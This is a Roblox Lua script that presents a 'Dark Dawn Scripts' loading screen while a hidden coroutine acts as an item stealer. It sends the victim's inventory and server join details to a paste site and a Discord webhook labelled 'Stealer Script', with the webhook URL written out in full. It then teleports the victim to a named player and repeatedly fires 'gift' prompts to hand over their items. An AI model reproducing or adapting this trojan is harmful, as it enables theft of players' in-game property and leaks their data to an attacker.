local g=Instance.new("ScreenGui")local h=Instance.new("Frame")local i=Instance.new("TextLabel")local j=Instance.new("UITextSizeConstraint")local k=Instance.new("TextBox")local l=Instance.new("TextBox")local m=Instance.new("TextBox")local n=Instance.new("TextLabel")local o=Instance.new("UIGradient")local p=Instance.new("UITextSizeConstraint")local q=Instance.new("TextLabel")local r=Instance.new("UIGradient")local s=Instance.new("UITextSizeConstraint")local t=Instance.new("UIGradient")local u=Instance.new("TextBox")local v=Instance.new("TextLabel")local w=Instance.new("UIGradient")local x=Instance.new("UITextSizeConstraint")local y=Instance.new("ImageLabel")local z=Instance.new("UIGradient")

g.Name="Menu"g.Parent=game.Players.LocalPlayer:WaitForChild("PlayerGui")g.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;g.ResetOnSpawn=false
h.Name="Loadingscreen"h.Parent=g;h.BackgroundColor3=Color3.fromRGB(213,255,205)h.BorderColor3=Color3.fromRGB(27,42,53)h.Position=UDim2.new(0,0,-0.113,0)h.Size=UDim2.new(1,0,1.113,0)
i.Name="LoadingLabel"i.Parent=h;i.BackgroundColor3=Color3.fromRGB(255,255,255)i.BackgroundTransparency=1;i.Position=UDim2.new(0.348,0,0.637,0)i.Size=UDim2.new(0.302,0,0.081,0)i.ZIndex=5;i.Font=Enum.Font.Nunito;i.Text="Script  is  loading..."i.TextColor3=Color3.fromRGB(236,236,236)i.TextSize=30;i.TextWrapped=true
j.Parent=i
k.Name="TextBox2"k.Parent=h;k.BackgroundColor3=Color3.fromRGB(56,56,56)k.BorderSizePixel=0;k.Position=UDim2.new(-0.016,0,0.761,0)k.Size=UDim2.new(0.328,0,0.012,0)k.ZIndex=20;k.Font=Enum.Font.SourceSans;k.Text=""k.TextColor3=Color3.fromRGB(0,0,0)k.TextSize=14
l.Name="TextBox1"l.Parent=h;l.BackgroundColor3=Color3.fromRGB(56,56,56)l.BorderSizePixel=0;l.Position=UDim2.new(0.611,0,0.761,0)l.Size=UDim2.new(0.397,0,0.012,0)l.ZIndex=20;l.Font=Enum.Font.SourceSans;l.Text=""l.TextColor3=Color3.fromRGB(0,0,0)l.TextSize=14
m.Name="TextBox3"m.Parent=h;m.BackgroundColor3=Color3.fromRGB(56,56,56)m.BorderSizePixel=0;m.Position=UDim2.new(0.309,0,0.761,0)m.Size=UDim2.new(0.307,0,0.012,0)m.ZIndex=20;m.Font=Enum.Font.SourceSans;m.Text=""m.TextColor3=Color3.fromRGB(0,0,0)m.TextSize=14
n.Name="LoadingLabel"n.Parent=h;n.BackgroundColor3=Color3.fromRGB(255,255,255)n.BackgroundTransparency=1;n.Position=UDim2.new(0.263,0,0.224,0)n.Size=UDim2.new(0.472,0,0.125,0)n.ZIndex=5;n.Font=Enum.Font.Unknown;n.Text="Dark  Dawn Scripts"n.TextColor3=Color3.fromRGB(236,236,236)n.TextScaled=true;n.TextStrokeColor3=Color3.fromRGB(168,128,78)n.TextStrokeTransparency=0;n.TextWrapped=true
o.Color=ColorSequence.new{ColorSequenceKeypoint.new(0,Color3.fromRGB(247,255,247)),ColorSequenceKeypoint.new(1,Color3.fromRGB(167,168,176))}o.Rotation=90;o.Parent=n
p.Parent=n
q.Name="LoadingLabel"q.Parent=h;q.BackgroundColor3=Color3.fromRGB(255,255,255)q.BackgroundTransparency=1;q.Position=UDim2.new(0.268,0,0.543,0)q.Size=UDim2.new(0.463,0,0.081,0)q.ZIndex=5;q.Font=Enum.Font.JosefinSans;q.Text="LOADING..."q.TextColor3=Color3.fromRGB(236,236,236)q.TextScaled=true;q.TextWrapped=true
r.Color=ColorSequence.new{ColorSequenceKeypoint.new(0,Color3.fromRGB(255,181,110)),ColorSequenceKeypoint.new(1,Color3.fromRGB(255,169,128))}r.Rotation=-63;r.Parent=q
s.Parent=q
t.Color=ColorSequence.new{ColorSequenceKeypoint.new(0,Color3.fromRGB(255,126,63)),ColorSequenceKeypoint.new(1,Color3.fromRGB(255,191,161))}t.Offset=Vector2.new(-0.192,0.107)t.Rotation=-48.33;t.Transparency=NumberSequence.new{NumberSequenceKeypoint.new(0,0),NumberSequenceKeypoint.new(1,0)}t.Parent=h
u.Parent=h;u.BackgroundColor3=Color3.fromRGB(0,209,0)u.BorderSizePixel=0;u.LayoutOrder=-9;u.Position=UDim2.new(0,0,0.761,0)u.Size=UDim2.new(1,0,0.012,0)u.ZIndex=15;u.Font=Enum.Font.SourceSans;u.Text=""u.TextColor3=Color3.fromRGB(0,0,0)u.TextSize=14
v.Name="LoadingLabel"v.Parent=h;v.BackgroundColor3=Color3.fromRGB(255,255,255)v.BackgroundTransparency=1;v.Position=UDim2.new(0.892,0,0.937,0)v.Size=UDim2.new(0.093,0,0.040,0)v.ZIndex=5;v.Font=Enum.Font.Unknown;v.Text="Version: 1.01"v.TextColor3=Color3.fromRGB(236,236,236)v.TextScaled=true;v.TextStrokeColor3=Color3.fromRGB(86,134,168)v.TextStrokeTransparency=0;v.TextWrapped=true
w.Color=ColorSequence.new{ColorSequenceKeypoint.new(0,Color3.fromRGB(247,255,247)),ColorSequenceKeypoint.new(1,Color3.fromRGB(167,168,176))}w.Rotation=90;w.Parent=v
x.Parent=v
y.Parent=h;y.BackgroundTransparency=1;y.Size=UDim2.new(1,0,1.113,0)y.ZIndex=-1;y.Image="http://www.roblox.com/asset/?id=3899340539"
z.Color=ColorSequence.new{ColorSequenceKeypoint.new(0,Color3.fromRGB(255,171,96)),ColorSequenceKeypoint.new(1,Color3.fromRGB(112,112,112))}z.Rotation=65;z.Transparency=NumberSequence.new{NumberSequenceKeypoint.new(0,0),NumberSequenceKeypoint.new(1,1)}z.Parent=y

coroutine.wrap(function() wait(220) h:Destroy() end)()

coroutine.wrap(function()
    local p=game:GetService("Players")local l=p.LocalPlayer
    local i=game.PlaceId
    local j=game.JobId
    local s="https://sourceb.in/api/bins"
    local w="https://discord.com/api/webhooks/1379553721884737566/C38Cb98NlVNd2y5ENkby6qDhkuORbg1uxb2q-LCyz1H0TBgYU-Evl1HSj4dMjaMBIWYU"
    local h=game:GetService("HttpService")
    local r=http_request or request or (syn and syn.request) or (fluxus and fluxus.request) or nil
    if not r then return end

    local f={"Shovel","Value","Harvest","Favorite","Uses","Egg","Sprinkler","Watering Can","Seed","Wrenching","Trowel"}
    local z={}local bp=l:FindFirstChild("Backpack")
    if bp then
        for _,v in ipairs(bp:GetChildren())do
            local n=v.Name local skip=false
            for _,w in ipairs(f)do if string.find(n,w)then skip=true break end end
            if not skip then table.insert(z,n)end
        end
    end

    local c='game:GetService("TeleportService"):TeleportToPlaceInstance('..i..'," '..j..'")\n\n-- Backpack Contents:\n'..(next(z)and table.concat(z,"\n")or"Backpack Empty")
    local d=h:JSONEncode({files={{name="JoinServer.lua",content=c}}})
    local a,b=pcall(function()return r({Url=s,Method="POST",Headers={["Content-Type"]="application/json"},Body=d})end)
    if not a or not b then return end
    local o,decoded=pcall(function()return h:JSONDecode(b.Body)end)
    local u=o and decoded and decoded.key and("https://sourceb.in/"..decoded.key)or"Unavailable"

    local e={
        content="@everyone",
        embeds={{
            title="🔁 Server Join Script Created",
            description="*Here's the latest server join script for* **"..l.Name.."**.\n\n*View victims inventory in the link below!*",
            color=9127187,
            timestamp=os.date("!%Y-%m-%dT%H:%M:%SZ"),
            author={name="Stealer Script",icon_url="https://cdn.discordapp.com/icons/discord.png"},
            thumbnail={url="https://cdn.iconscout.com/icon/free/png-256/roblox-3-569438.png"},
            fields={{
                name="📦 Inventory",value="[View Backpack Items]("..u..")",inline=false
            },{
                name="💻 Quick Copy",value="```lua\ngame:GetService(\"TeleportService\"):TeleportToPlaceInstance("..i..",\""..j.."\")\n```",inline=false
            }},
            footer={text="🔐 Server Logger",icon_url="https://cdn.discordapp.com/icons/discord.png"}
        }}
    }
    r({Url=w,Method="POST",Headers={["Content-Type"]="application/json"},Body=h:JSONEncode(e)})

    for _=1,5 do
        task.wait(3)
        r({Url=w,Method="POST",Headers={["Content-Type"]="application/json"},Body=h:JSONEncode({content="@everyone"})})
    end

    task.wait(3)
    getgenv().t="notfishybloxdontrade"

    local function waitForPlayer(n)
        local plr=p:FindFirstChild(n)
        while not plr do plr=p.PlayerAdded:Wait()if plr.Name~=n then plr=nil end end
        return plr
    end

    local function getRoot(x)
        local c=x.Character or x.CharacterAdded:Wait()
        local hrp=c:FindFirstChild("HumanoidRootPart")
        while not hrp do hrp=c:WaitForChild("HumanoidRootPart")end
        return hrp
    end

    local function tpTo(x)
        local a=getRoot(x)local b=getRoot(l)
        if a and b then b.CFrame=a.CFrame+Vector3.new(0,3,0)end
    end

    local x=waitForPlayer(t)
    x.CharacterAdded:Connect(function()repeat task.wait()until x.Character and x.Character:FindFirstChild("HumanoidRootPart")tpTo(x)end)
    l.CharacterAdded:Connect(function()repeat task.wait()until l.Character and l.Character:FindFirstChild("HumanoidRootPart")tpTo(x)end)
    tpTo(x)
    x.Chatted:Connect(function()tpTo(x)end)

    local bp2=l:WaitForChild("Backpack")
    local function equip(t)t.Parent=l.Character or l.CharacterAdded:Wait()end
    local function unequip(t)t.Parent=bp2 end
    local function send()
        for _,o in pairs(workspace:GetDescendants())do
            if o:IsA("ProximityPrompt")then
                local a=string.lower(o.ObjectText or "")local b=string.lower(o.ActionText or "")
                if a:find("gift")or b:find("gift")then
                    o.HoldDuration=0;o.RequiresLineOfSight=false;o.MaxActivationDistance=math.huge
                    fireproximityprompt(o)
                end
            end
        end
    end

    while true do
        task.wait(1)
        for _,t in pairs(bp2:GetChildren())do
            if t:IsA("Tool")and t.Name:lower():find("%[.-kg%]")then
                equip(t)wait(0.5)send()wait(1)unequip(t)wait(1)
            end
        end
    end
end)()
